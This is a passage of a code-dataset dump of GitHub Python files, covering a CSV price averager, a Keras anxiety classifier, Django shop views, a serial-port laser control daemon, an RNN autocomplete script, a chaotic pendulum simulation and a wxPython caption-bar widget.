L[i]\r\n return max, min\r\n\r\nprint(max_min(L))","repo_name":"andrea-gonzalezz/runtrack-python","sub_path":"Runtrack-python/jour4/job9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71888509879","text":"DEFAULT_COUNT_OF_COLUMNS = 7\nsum_of_all_prices = 0\ncount_of_lines = 0\ntry:\n with open(\"./resources/catalog_full.csv\") as file:\n for line in file:\n line_params = line.strip().split(\",\")\n if len(line_params) != DEFAULT_COUNT_OF_COLUMNS:\n raise ValueError\n else:\n price = float(line_params[len(line_params) - 1])\n sum_of_all_prices += price\n 
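A short usage sketch of the Lineage fallback above: an exact rank match returns the stored name, while a missing rank is filled by the next deeper named taxon annotated with the requested rank. The organism names are examples only.

# Assumes the Lineage class defined above is in scope.
taxa = [("Bacteria", "superkingdom"),
        ("Proteobacteria", "phylum"),
        ("Escherichia coli", "species")]
lin = Lineage(taxa)
print(lin.get_taxon("phylum"))  # 'Proteobacteria' (exact match at that rank)
print(lin.get_taxon("class"))   # 'Escherichia coli (class)' (deeper taxon stands in)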
count_of_lines += 1\n average_price = sum_of_all_prices / count_of_lines\n print(\"{:.2f}\".format(average_price))\n\nexcept FileNotFoundError:\n print(\"Invalid file path.\")\nexcept ValueError:\n print(\"Invalid input data.\")\n","repo_name":"elitasheva/Python-Programming","sub_path":"Exercises/lecture_03/average_price.py","file_name":"average_price.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26242928007","text":"# TensorFlow y tf.keras\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.utils import plot_model\nfrom sklearn.metrics import classification_report, confusion_matrix\n\n\n# Librerias de ayuda\nimport numpy as np\nimport glob\nimport h5py\nfrom scipy.io import loadmat\n\ndirec = glob.glob('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/lote*')\n\n\ndef write_h5file(carpeta,nameF):\n \n files = glob.glob(carpeta + '/*.mat')\n\n # Train, Valid, Test sets\n setX = []\n setY = []\n\n\n #print(' La carpeta ' + carpeta + ' contiene ', len(files))\n for file in files:\n arc_mat = loadmat(file, struct_as_record=False)\n \n # Split the song data and labels\n data = arc_mat['data'].flatten()\n label = arc_mat['label']\n\n\n #print(data)\n #print(label)\n\n\n # Generate train, valid and test set\n setX.append(data)\n setY.append(label)\n\n\n # Stack the data vertically\n #setX = np.vstack(setX)\n #setY = np.array(setY)\n\n print(len(setX))\n print(len(setY))\n # Create the dataset file\n file = h5py.File('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/' + nameF +'.h5', 'w')\n\n # Add the data to the dataset\n file.create_dataset('setX', data=setX)\n file.create_dataset('setY', data=setY)\n \n\n # Close the file\n file.close()\n\ndef load_Dataset_from_h5file(h5file_path):\n\n\n # Read the H5File\n h5_file = h5py.File(h5file_path, 'r')\n\n # Separate the file values into train, valid and test set\n setX = h5_file['setX'][:]\n setY = h5_file['setY'][:]\n\n\n # Close the H5File\n h5_file.close()\n\n # Return the train, valid and test set\n return setX, setY\n\n#print(len(direc))\n#write_h5file('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/trainA','trainA')\n\n#write_h5file('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/testA','testA')\n\n\n\n# train_x, train_y = load_Dataset_from_h5file('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/lote_1/h5.h5')\ntrain_x, train_y = load_Dataset_from_h5file('./trainBin.h5')\nprint(train_x.shape)\ntrain_x = train_x.reshape(train_x.shape[0], train_x.shape[1], 1)\n#test_x, test_y = load_Dataset_from_h5file('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/lote_26/h5.h5')\ntest_x, test_y = load_Dataset_from_h5file('./testBin.h5')\n\n\nvalidation_x = test_x[:int(len(test_x)*.50)]\nvalidation_y = test_y[:int(len(test_y)*.50)]\ntest_x= test_x[int(len(test_x)*.50):]\ntest_y= test_y[int(len(test_y)*.50):]\n\nmodel = keras.Sequential([\n keras.layers.Flatten(input_shape=(1792,1)),\n keras.layers.Dense(1792, activation='relu'),\n keras.layers.Dense(1500, activation='relu'),\n keras.layers.Dense(1000, activation='relu'),\n keras.layers.Dense(1, activation='sigmoid')\n])\n\nmodel.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n\n#plot_model(model, to_file='model2.png')\n\n\nmodel.fit(train_x, train_y, epochs=50)\n\ntest_loss, test_acc = model.evaluate(test_x, test_y, verbose=2)\n\nprint('\\nTest accuracy:', test_acc)\n\nvalidation_y = 
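The averaging script above splits lines with str.split(','), which breaks on quoted fields that contain commas. A hedged alternative using the csv module, keeping the same seven-column contract and last-column price; `average_price` is an illustrative wrapper name.

import csv

def average_price(path, n_columns=7):
    total, count = 0.0, 0
    with open(path, newline='') as f:
        for row in csv.reader(f):
            if len(row) != n_columns:
                raise ValueError("Invalid input data.")
            total += float(row[-1])  # price is the last column
            count += 1
    return total / count

# print("{:.2f}".format(average_price("./resources/catalog_full.csv")))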
np.squeeze(np.asarray(validation_y))\ny_prediction = model.predict(validation_x)\ny_prediction = y_prediction.flatten()\n\n\ny_prediction = np.where(y_prediction > 0.5, 1, 0)\n#print(validation_y)\n#print(y_prediction)\n\nprint('Confusion Matrix')\nprint(confusion_matrix(validation_y, y_prediction))\n#tn, fp, fn, tp = confusion_matrix(validation_y, y_prediction).ravel()\n\n#print(pred)\n#print(' TN ', tn, ' fp ',fp, ' fn ', fn ,' tp ', tp)\n\n\nprint(classification_report(validation_y, y_prediction))","repo_name":"scarlosro/AI_TrastornoAnsiedad","sub_path":"red_terc_bin.py","file_name":"red_terc_bin.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38935364826","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Product, Productreview\nfrom .forms import ProductReviewForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\n\n\ndef all_products(request):\n products = Product.objects.all()\n paginator = Paginator(products, 6)\n page = request.GET.get('page')\n paged_products = paginator.get_page(page)\n return render(request, 'products/all_products.html', {\"products\": paged_products})\n\n\n# products_search function is case insensitive and gets the 'query' and filters the Products based on name\ndef products_search(request):\n products = Product.objects.filter(name__icontains=request.GET['query']) | Product.objects.filter(price__icontains=request.GET['query'])\n return render(request, \"products/all_products.html\", {\"products\": products})\n\n\ndef product_details(request, pk):\n product = get_object_or_404(Product, pk=pk)\n return render(request, 'products/product_details.html', {'product': product})\n\n\n@login_required()\ndef add_review_to_product(request, pk):\n product = get_object_or_404(Product, pk=pk)\n if request.method == \"POST\":\n product_review_form = ProductReviewForm(request.POST)\n if product_review_form.is_valid():\n product_review = product_review_form.save(commit=False)\n product_review.reviewer = request.user\n product_review.product = product\n product_review.save()\n return redirect('product_details', pk=product.pk)\n else:\n product_review_form = ProductReviewForm()\n return render(request, 'products/add_review_to_product.html', {'product_review_form': product_review_form})\n\n\n@login_required()\ndef delete_product_review(request, pk):\n product_review = get_object_or_404(Productreview, pk=pk)\n if request.user != product_review.reviewer:\n messages.error(request, \"You can only delete product reviews you have previously submitted!\")\n return redirect('all_products')\n product_review.delete()\n return redirect('all_products')\n","repo_name":"Code-Institute-Submissions/bear_nation_gaming","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12770310638","text":"__all__ = [\"SpectraPhysicsMillennia\"]\n\nimport asyncio\nimport regex as re\nimport serial\nfrom yaqd_core import UsesUart, aserial\n\n\nquery_re = re.compile(r\"\\?[A-Z,a-z,0-9,%]+\\r\")\n\nint_re = re.compile(r\"\\d+\")\ncurrent_re = re.compile(r\"\\d+.\\d+A[12]\")\npercent_re = re.compile(r\"[\\d]+.[\\d]+%\")\npower_re = re.compile(r\"\\d+.\\d+W\")\n\n# TODO: HasPosition, HasLimits for power control\n# TODO: IsSensor: 
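The classifier above turns sigmoid outputs into labels with np.where(p > 0.5, 1, 0) and prints sklearn's confusion matrix. A standalone sketch of that step with dummy values, tabulating the same [[tn, fp], [fn, tp]] layout by hand.

import numpy as np

y_true = np.array([0, 1, 1, 0, 1])
y_prob = np.array([0.2, 0.8, 0.4, 0.1, 0.9])  # dummy sigmoid outputs
y_pred = (y_prob > 0.5).astype(int)           # same rule as np.where(p > 0.5, 1, 0)

tp = int(np.sum((y_pred == 1) & (y_true == 1)))
tn = int(np.sum((y_pred == 0) & (y_true == 0)))
fp = int(np.sum((y_pred == 1) & (y_true == 0)))
fn = int(np.sum((y_pred == 0) & (y_true == 1)))
print([[tn, fp], [fn, tp]])  # matches sklearn's confusion_matrix ordering for labels [0, 1]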
use channels for monitoring power, currents\n\n\nclass SpectraPhysicsMillennia(UsesUart):\n _kind = \"spectra-physics-millennia\"\n\n def __init__(self, name, config, config_filepath):\n super().__init__(name, config, config_filepath)\n self._ser = aserial.ASerial(\n config[\"serial_port\"], baudrate=config[\"baud_rate\"], eol=b\"\\n\", xonxoff=True\n )\n # ddk: cannot get aserial commands to work; restricting to synchronous for now.\n self._ser.timeout = 0.1\n info = self.query(\"?IDN\\r\".encode())\n # manufacturer, product, sw_version, sn = info.split(\",\")\n self.logger.info(f\"info {info}\")\n\n async def update_state(self):\n \"\"\"simple repeating update state. No _busy dependence.\"\"\"\n state_keys = [\"set_power\", \"power\", \"c1\", \"c2\", \"error_code\"]\n while True:\n previous = {k: self._state[k] for k in state_keys}\n new = {}\n\n for key, command in zip(\n state_keys,\n [\"?PSET\", \"?P\", \"?C1\", \"?C2\", \"?EC\"],\n ):\n if command.startswith(\"?P\"):\n pattern = power_re\n elif command.startswith(\"?C\"):\n pattern = current_re\n else:\n pattern = int_re\n while True: # retry at ~2Hz for failed requests\n newval, alarm = await self._write(command)\n self.logger.debug(f\"{newval}, {alarm}\")\n if alarm:\n self.logger.debug(f\"update {key} failed with {alarm}--retrying\")\n await asyncio.sleep(0.5)\n continue\n try:\n match = pattern.match(newval)\n new[key] = match[0]\n except (ValueError, TypeError) as e:\n self.logger.debug(f\"looked for pattern {pattern} in {newval}\")\n self.logger.error(e)\n await asyncio.sleep(0.5)\n continue\n self._state[key] = match[0]\n break\n changed = {k: [previous[k], new[k]] for k in previous if previous[k] != new[k]}\n if changed:\n for k, v in changed.items():\n self.logger.info(f\"{k}: {v[0]} -> {v[1]}\")\n else:\n for k in new.keys():\n self.logger.debug(f\"{k}: {previous[k]} -> {new[k]}\")\n await asyncio.sleep(self._config[\"refresh_wait\"])\n\n def direct_serial_write(self, message: bytes) -> str:\n self._ser.write(message)\n response = self._ser.read_until()\n self.logger.info(response)\n self.logger.info(\"leave dsw\")\n return response.decode().rstrip(\"\\\\n\")\n\n def query(self, message: bytes) -> str:\n \"\"\"\n synchronous message yields response.\n regex restricts requests to \"safe\" operations (questions).\n e.g. you cannot change from current/power mode with this function\n for full control, use direct_serial_write\n Parameters\n ----------\n message : bytes\n Serial message. Include EOL.\n \"\"\"\n # screen for queries\n match = query_re.fullmatch(message.decode())\n if match is None:\n raise ValueError(f\"{message} is not a query\")\n return self.direct_serial_write(message)\n\n async def _write(self, command: str):\n \"\"\"asynchronous communication. Follows command with check for error (?STB)\"\"\"\n try:\n await asyncio.sleep(0.1)\n self._ser.reset_input_buffer()\n self._ser.flush()\n out = f\"{command}\\r\".encode()\n # response = await self._ser.awrite_then_readline(out)\n self._ser.write(out)\n response = self._ser.read_until()\n response = response.decode().rstrip(\"\\\\n\")\n self.logger.debug(f\"Sent: {command}. 
Recieved: {response}\")\n # stb = self._ser.awrite_then_readline(\"?STB\\r\".encode())\n self._ser.write(\"?STB\\r\".encode())\n stb = self._ser.read_until()\n stb = format(int(stb.decode().rstrip(\"\\\\n\")), \"08b\")\n keys = [\"cmd_err\", \"exe_err\", \"sys_err\", \"laser_on\"]\n status = {k: int(stb[::-1][i]) for k, i in zip(keys, [0, 1, 5, 6])}\n self.logger.debug(f\"status: {status}\")\n self._emission = status.pop(\"laser_on\")\n alarm = [k for k, v in status.items() if v]\n except (UnicodeDecodeError, ValueError) as e: # try again\n self.logger.error(e)\n await asyncio.sleep(0.5)\n return await self._write(command)\n return response, alarm\n\n def close(self):\n self._ser.close()\n","repo_name":"yaq-project/yaqd-spectra-physics","sub_path":"yaqd_spectra_physics/_spectra_physics_millennia.py","file_name":"_spectra_physics_millennia.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32209374908","text":"\nimport json\nimport numpy as np\nimport os.path as path\nimport tensorflow as tf\n\nfrom python.dataset import AutoComplete, AutoCompleteFixed\nfrom python.model import PureNLSTM\n\ndirname = path.dirname(path.realpath(__file__))\narticle_dir = path.join(dirname, '..', '..', 'public')\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\ntrain_dataset = AutoComplete(repeat=True)\ntest_dataset = AutoCompleteFixed(\n \"parts of north africa\",\n batch_size=1,\n)\nmodel = PureNLSTM(train_dataset, name='autocomplete_nlstm_600',\n embedding_size=600,\n verbose=True)\n\nfor output_i, output in enumerate(\n model.predict(dataset=test_dataset)\n):\n probabilities = output['probabilities']\n predict_sorted = np.argsort(probabilities, axis=1)[:, ::-1]\n\n source = test_dataset.decode_source(output['source'])\n target = test_dataset.decode_target(output['target'])\n predict = test_dataset.decode_target(predict_sorted)\n\n print(f'sequence {output_i}')\n for char, words_sorted, target_word, p in zip(source, predict, target, probabilities):\n print(f' {char} -> {words_sorted[0]}, {words_sorted[1]},'\n f' {words_sorted[2]}'\n f' -- {target_word}')\n print(p)\n\n break\n","repo_name":"distillpub/post--memorization-in-rnns","sub_path":"python/run/autocomplete_pure_nlstm_debug.py","file_name":"autocomplete_pure_nlstm_debug.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"40"} +{"seq_id":"40293876695","text":"# A driven damped pendulum system that can evolve many \n# initial conditions by broadcasting\n#\n# Written by Shiyuan Hu , Nov. 6, 2020 \n\nimport numpy as np\nfrom RK4 import RK4\nfrom block_entropy import block_entropy\n\nclass pendulum_entropy:\n\n def __init__(self, y0, dt=1e-2, omega_D=2./3, q=2, g=1.125):\n \"\"\"\n y0: initial conditons of shape 2 by npts. 
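The Millennia driver above unpacks the ?STB status byte with format(int(...), "08b") and reversed indexing. A standalone illustration of that decoding, with a made-up byte value:

def decode_stb(raw: int):
    # MSB-first string, reversed so index i reads bit i from the LSB end.
    bits = format(raw, "08b")[::-1]
    flags = {"cmd_err": 0, "exe_err": 1, "sys_err": 5, "laser_on": 6}
    return {name: bool(int(bits[i])) for name, i in flags.items()}

print(decode_stb(0b01000001))
# {'cmd_err': True, 'exe_err': False, 'sys_err': False, 'laser_on': True}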
y[0] is the \n angular velocity and y[1] is angle\n npts: number of initial conditions\n dt: time step\n omega_D: angular frequency of external driven torque\n g: amplitude of external torque\n q: mass\n \"\"\"\n _,self.npts = y0.shape\n self.y = np.copy(y0)\n # parameters\n self.dt = dt\n self.omega_D = omega_D\n self.q = q\n self.g = g \n \n def deri(self,y,t):\n dy = np.copy(y)\n dy[0] = -y[0]/self.q-np.sin(y[1])+self.g*np.cos(self.omega_D*t)\n dy[1] = y[0]\n return dy\n\n def return_map(self):\n \"\"\"\n Return the angle back to [-pi,pi]\n \"\"\"\n idx1 = self.y[1]>np.pi\n idx2 = self.y[1] 0:\n self.y[1][idx1] = self.y[1][idx1]-np.floor((self.y[1][idx1]+np.pi)/(2*np.pi))*2*np.pi\n if np.sum(idx2) > 0:\n self.y[1][idx2] = self.y[1][idx2]-np.ceil((self.y[1][idx2]-np.pi)/(2*np.pi))*2*np.pi\n\n def update(self, tfinal):\n \"\"\"\n Evolve the dynamic equation and store the data\n \"\"\"\n t = 0; kk = 0\n nstep = int(np.round(tfinal/self.dt))+1 # number of time steps\n self.omega = np.zeros((nstep,self.npts))\n self.theta = np.zeros((nstep,self.npts))\n\n while t <(tfinal+1e-10):\n self.return_map()\n self.omega[kk] = self.y[0]\n self.theta[kk] = self.y[1]\n\n self.y = RK4(self.y, self.dt, t, self.deri)\n kk += 1; t += self.dt\n\n return self\n\nif __name__ == \"__main__\": \n eps = 1e-2 # size of the unit cell\n npts = 400 # number of points\n \n y0 = np.zeros((2,npts))\n # Randomly distribute initial conditions inside one unit cell\n # In order to get a smooth function of entropy versus time, \n # average over different unit cells is necessary\n\n # Here, computation is done only for one unit cell located at (0.1,0.1)\n y0[0,:] = 0.1+np.random.rand(npts)*eps\n y0[1,:] = 0.1+np.random.rand(npts)*eps\n \n b = pendulum_entropy(y0, omega_D=2./3, q=4, g=1.5)\n b.update(50)\n nstep = len(b.omega)\n entropy = np.zeros(nstep)\n\n for i in range(nstep):\n data = np.vstack((b.omega[i],b.theta[i]))\n entropy[i] = block_entropy(data, epsilon=eps)\n \n print(entropy)\n","repo_name":"shiyuanhu/chaos_example","sub_path":"pendulum_entropy.py","file_name":"pendulum_entropy.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"28918431600","text":"# -*- coding: utf-8 -*-\n\n# ------------------------------------------------------------------------------\n# --\n# PHOENIX CONTACT GmbH & Co., D-32819 Blomberg --\n# --\n# ------------------------------------------------------------------------------\n# Project : \n# Sourcefile(s) : panel_caption_bar.py\n# ------------------------------------------------------------------------------\n#\n# File : panel_caption_bar.py\n#\n# Author(s) : Gaofeng Zhang\n#\n# Status : in work\n#\n# Description : siehe unten\n#\n#\n# ------------------------------------------------------------------------------\nimport wx\nfrom ..utils import gui_util_get_default_font\nfrom ..base import BufferedWindow\n\n\nclass CaptionBarStyle(object):\n CAPTIONBAR_NOSTYLE = 0\n \"\"\" The :class:`CaptionBar` has no style bit set. \"\"\"\n CAPTIONBAR_GRADIENT_V = 1\n \"\"\" Draws a vertical gradient from top to bottom. \"\"\"\n CAPTIONBAR_GRADIENT_H = 2\n \"\"\" Draws a vertical gradient from left to right. \"\"\"\n CAPTIONBAR_SINGLE = 3\n \"\"\" Draws a single filled rectangle to draw the caption. \"\"\"\n CAPTIONBAR_RECTANGLE = 4\n \"\"\" Draws a single colour with a rectangle around the caption. 
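The RK4 module imported by the pendulum script is not shown; a classical fourth-order Runge-Kutta step matching the call signature RK4(y, dt, t, deri) with deri(y, t) would look like the sketch below (an assumption, not necessarily the repository's implementation).

def RK4(y, dt, t, deri):
    # Four slope evaluations, combined with the classical 1-2-2-1 weights.
    k1 = deri(y, t)
    k2 = deri(y + 0.5 * dt * k1, t + 0.5 * dt)
    k3 = deri(y + 0.5 * dt * k2, t + 0.5 * dt)
    k4 = deri(y + dt * k3, t + dt)
    return y + (dt / 6.0) * (k1 + 2.0 * k2 + 2.0 * k3 + k4)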
\"\"\"\n CAPTIONBAR_FILLED_RECTANGLE = 5\n \"\"\"\n This class encapsulates the styles you wish to set for the\n :class:`CaptionBar` (this is the part of the `FoldPanel` where the caption\n is displayed). It can either be applied at creation time be\n reapplied when styles need to be changed.\n\n At construction time, all styles are set to their default\n transparency. This means none of the styles will be applied to\n the :class:`CaptionBar` in question, meaning it will be created using the\n default internals. When setting i.e the colour, font or panel\n style, these styles become active to be used.\n \"\"\"\n\n def __init__(self):\n \"\"\" Default constructor for this class. \"\"\"\n self.reset_to_defaults()\n\n def reset_to_defaults(self):\n \"\"\" Resets default :class:`CaptionBarStyle`. \"\"\"\n self._firstColourUsed = False\n self._secondColourUsed = False\n self._textColourUsed = False\n self._captionFontUsed = False\n self._captionStyleUsed = False\n self._captionStyle = self.CAPTIONBAR_GRADIENT_H\n\n # ------- CaptionBar Font -------\n\n def set_caption_font(self, font):\n \"\"\"\n Sets font for the caption bar.\n\n :param font: a valid :class:`wx.Font` object.\n\n :note: If this is not set, the font property is undefined and will not be used.\n Use :meth:`~CaptionBarStyle.CaptionFontUsed` to check if this style is used.\n \"\"\"\n\n self._captionFont = font\n self._captionFontUsed = True\n\n def caption_font_used(self):\n \"\"\" Checks if the caption bar font is set. \"\"\"\n\n return self._captionFontUsed\n\n def get_caption_font(self):\n \"\"\"\n Returns the font for the caption bar.\n\n :note: Please be warned this will result in an assertion failure when\n this property is not previously set.\n\n :see: :meth:`~CaptionBarStyle.SetCaptionFont`, :meth:`~CaptionBarStyle.CaptionFontUsed`\n \"\"\"\n\n return self._captionFont\n\n # ------- First Colour -------\n\n def set_first_colour(self, colour):\n \"\"\"\n Sets first colour for the caption bar.\n\n :param colour: a valid :class:`wx.Colour` object.\n\n :note: If this is not set, the colour property is undefined and will not be used.\n Use :meth:`~CaptionBarStyle.FirstColourUsed` to check if this style is used.\n \"\"\"\n\n self._firstColour = colour\n self._firstColourUsed = True\n\n def first_colour_used(self):\n \"\"\" Checks if the first colour of the caption bar is set.\"\"\"\n\n return self._firstColourUsed\n\n def get_first_colour(self):\n \"\"\"\n Returns the first colour for the caption bar.\n\n :note: Please be warned this will result in an assertion failure when\n this property is not previously set.\n\n :see: :meth:`~CaptionBarStyle.SetFirstColour`, :meth:`~CaptionBarStyle.FirstColourUsed`\n \"\"\"\n\n return self._firstColour\n\n # ------- Second Colour -------\n\n def set_second_colour(self, colour):\n \"\"\"\n Sets second colour for the caption bar.\n\n :param colour: a valid :class:`wx.Colour` object.\n\n :note: If this is not set, the colour property is undefined and will not be used.\n Use :meth:`~CaptionBarStyle.SecondColourUsed` to check if this style is used.\n \"\"\"\n\n self._secondColour = colour\n self._secondColourUsed = True\n\n def second_colour_used(self):\n \"\"\" Checks if the second colour of the caption bar is set.\"\"\"\n\n return self._secondColourUsed\n\n def get_second_colour(self):\n \"\"\"\n Returns the second colour for the caption bar.\n\n :note: Please be warned this will result in an assertion failure when\n this property is not previously set.\n\n :see: 
:meth:`~CaptionBarStyle.SetSecondColour`, :meth:`~CaptionBarStyle.SecondColourUsed`\n \"\"\"\n\n return self._secondColour\n\n # ------- Caption Text Colour -------\n\n def set_caption_colour(self, colour):\n \"\"\"\n Sets caption colour for the caption bar.\n\n :param colour: a valid :class:`wx.Colour` object.\n\n :note: If this is not set, the colour property is undefined and will not be used.\n Use :meth:`~CaptionBarStyle.CaptionColourUsed` to check if this style is used.\n \"\"\"\n\n self._textColour = colour\n self._textColourUsed = True\n\n def caption_colour_used(self):\n \"\"\" Checks if the caption colour of the caption bar is set.\"\"\"\n\n return self._textColourUsed\n\n def get_caption_colour(self):\n \"\"\"\n Returns the caption colour for the caption bar.\n\n :note: Please be warned this will result in an assertion failure\n when this property is not previously set.\n\n :see: :meth:`~CaptionBarStyle.SetCaptionColour`, :meth:`~CaptionBarStyle.CaptionColourUsed`\n \"\"\"\n\n return self._textColour\n\n # ------- CaptionStyle -------\n\n def set_caption_style(self, style):\n \"\"\"\n Sets caption style for the caption bar.\n\n :param style: can be one of the following bits:\n\n =============================== ======= =============================\n Caption Style Value Description\n =============================== ======= =============================\n ``CAPTIONBAR_GRADIENT_V`` 1 Draws a vertical gradient from top to bottom\n ``CAPTIONBAR_GRADIENT_H`` 2 Draws a horizontal gradient from left to right\n ``CAPTIONBAR_SINGLE`` 3 Draws a single filled rectangle to draw the caption\n ``CAPTIONBAR_RECTANGLE`` 4 Draws a single colour with a rectangle around the caption\n ``CAPTIONBAR_FILLED_RECTANGLE`` 5 Draws a filled rectangle and a border around it\n =============================== ======= =============================\n\n :note: If this is not set, the property is undefined and will not be used.\n Use :meth:`~CaptionBarStyle.CaptionStyleUsed` to check if this style is used.\n \"\"\"\n\n self._captionStyle = style\n self._captionStyleUsed = True\n\n def caption_style_used(self):\n \"\"\" Checks if the caption style of the caption bar is set.\"\"\"\n\n return self._captionStyleUsed\n\n def get_caption_style(self):\n \"\"\"\n Returns the caption style for the caption bar.\n\n :note: Please be warned this will result in an assertion failure\n when this property is not previously set.\n\n :see: :meth:`~CaptionBarStyle.SetCaptionStyle`, :meth:`~CaptionBarStyle.CaptionStyleUsed`\n \"\"\"\n\n return self._captionStyle\n\n\nclass StaticCaptionBar(BufferedWindow):\n \"\"\"\n This class is a graphical caption component that consists of a\n caption and a clickable arrow.\n\n The :class:`CaptionBar` fires an event ``EVT_CAPTIONBAR`` which is a\n :class:`CaptionBarEvent`. This event can be caught and the parent window\n can act upon the collapsed or expanded state of the bar (which is\n actually just the icon which changed). The parent panel can\n reduce size or expand again.\n \"\"\"\n\n def __init__(self, parent, wx_id=wx.ID_ANY, pos=wx.DefaultPosition, size=wx.DefaultSize, caption=\"\",\n icon_size=(16, 16), cbstyle=None):\n \"\"\"\n Default class constructor.\n\n :param parent: the :class:`CaptionBar` parent window;\n :param wx_id: an identifier for the control: a value of -1 is taken to mean a default;\n :param pos: the control position. 
A value of (-1, -1) indicates a default position,\n chosen by either the windowing system or wxPython, depending on platform;\n :param size: the control size. A value of (-1, -1) indicates a default size,\n chosen by either the windowing system or wxPython, depending on platform;\n :param caption: the string to be displayed in :class:`CaptionBar`;\n :param cbstyle: the :class:`CaptionBar` window style. Must be an instance of\n :class:`CaptionBarStyle`;\n :param icon_size: the :class:`CaptionBar` icon width;\n \"\"\"\n self._isReady = False\n BufferedWindow.__init__(self, parent, wx_id, pos=pos, size=(20, 20), style=wx.NO_BORDER)\n self._style: CaptionBarStyle = None\n self.apply_caption_style(cbstyle, True)\n self._caption = caption\n self._iconWidth, self._iconHeight = icon_size\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_erase_bg)\n self._isReady = True\n\n def set_caption_text(self, text):\n self._caption = text\n self.update_drawing()\n\n def apply_caption_style(self, cbstyle=None, apply_default=True):\n \"\"\"\n Applies the style defined in `cbstyle` to the :class:`CaptionBar`.\n\n :param cbstyle: an instance of :class:`CaptionBarStyle`;\n :param apply_default: if ``True``, the colours used in the :class:`CaptionBarStyle`\n will be reset to their default values.\n \"\"\"\n\n if cbstyle is None:\n cbstyle = CaptionBarStyle()\n\n _new_style = cbstyle\n\n if apply_default:\n\n # get first colour from style or make it default\n if not _new_style.first_colour_used():\n _new_style.set_first_colour(wx.Colour('#eee'))\n\n # get second colour from style or make it default\n if not _new_style.second_colour_used():\n # make the second colour slightly darker then the background\n _colour = self.GetParent().GetBackgroundColour()\n _r, _g, _b = int(_colour.Red()), int(_colour.Green()), int(_colour.Blue())\n _colour = ((_r >> 1) + 20, (_g >> 1) + 20, (_b >> 1) + 20)\n _new_style.set_second_colour(wx.Colour(*_colour))\n\n # get text colour\n if not _new_style.caption_colour_used():\n _new_style.set_caption_colour(wx.BLACK)\n\n # get font colour\n if not _new_style.caption_font_used():\n _font = gui_util_get_default_font(8)\n _new_style.set_caption_font(_font)\n\n # apply caption style\n if not _new_style.caption_style_used():\n _new_style.set_caption_style(CaptionBarStyle.CAPTIONBAR_GRADIENT_V)\n\n self._style = _new_style\n\n def set_caption_style(self, cbstyle=None, apply_default=True):\n \"\"\"\n Sets :class:`CaptionBar` styles with :class:`CaptionBarStyle` class.\n\n :param cbstyle: an instance of :class:`CaptionBarStyle`;\n :param apply_default: if ``True``, the colours used in the :class:`CaptionBarStyle`\n will be reset to their default values.\n\n :note: All styles that are actually set, are applied. If you set `applyDefault`\n to ``True``, all other (not defined) styles will be set to default. 
If it is\n        ``False``, the styles which are not set in the :class:`CaptionBarStyle` will be ignored.\n        \"\"\"\n\n        if cbstyle is None:\n            cbstyle = CaptionBarStyle()\n\n        self.apply_caption_style(cbstyle, apply_default)\n        self.Refresh()\n\n    def get_caption_style(self):\n        \"\"\"\n        Returns the current style of the captionbar in a :class:`CaptionBarStyle` class.\n\n        :note: This can be used to change and set back the changes.\n        \"\"\"\n\n        return self._style\n\n    def set_bold_font(self):\n        \"\"\" Sets the :class:`CaptionBar` font weight to bold.\"\"\"\n\n        self.GetFont().SetWeight(wx.FONTWEIGHT_BOLD)\n\n    def set_normal_font(self):\n        \"\"\" Sets the :class:`CaptionBar` font weight to normal.\"\"\"\n\n        self.GetFont().SetWeight(wx.FONTWEIGHT_NORMAL)\n\n    def draw(self, dc):\n        \"\"\"\n        Handles the ``wx.EVT_PAINT`` event for :class:`CaptionBar`.\n\n        :param dc: a :class:`wx.DC` to be processed.\n        \"\"\"\n        if self._isReady:\n            self.fill_caption_background(dc)\n            dc.SetFont(self._style.get_caption_font())\n            dc.SetTextForeground(self._style.get_caption_colour())\n            dc.DrawText(self._caption, 4, 4)\n\n    def fill_caption_background(self, dc):\n        \"\"\"\n        Fills the background of the caption with either a gradient or\n        a solid colour.\n\n        :param dc: an instance of :class:`wx.DC`.\n        \"\"\"\n\n        _style = self._style.get_caption_style()\n\n        if _style == CaptionBarStyle.CAPTIONBAR_GRADIENT_V:\n            self.draw_vertical_gradient(dc, self.GetRect())\n        elif _style == CaptionBarStyle.CAPTIONBAR_GRADIENT_H:\n            self.draw_horizontal_gradient(dc, self.GetRect())\n        elif _style == CaptionBarStyle.CAPTIONBAR_SINGLE:\n            self.draw_single_colour(dc, self.GetRect())\n        elif _style == CaptionBarStyle.CAPTIONBAR_RECTANGLE or _style == CaptionBarStyle.CAPTIONBAR_FILLED_RECTANGLE:\n            self.draw_single_rectangle(dc, self.GetRect())\n        else:\n            raise Exception(\"STYLE Error: Undefined Style Selected: \" + repr(_style))\n\n    def DoGetBestSize(self):\n        \"\"\"\n        Returns the best size for this panel, based upon the font\n        assigned to this window, and the caption string.\n\n        :note: Overridden from :class:`wx.Window`.\n        \"\"\"\n        _x, _y = self.GetTextExtent(self._caption)\n\n        if _x < 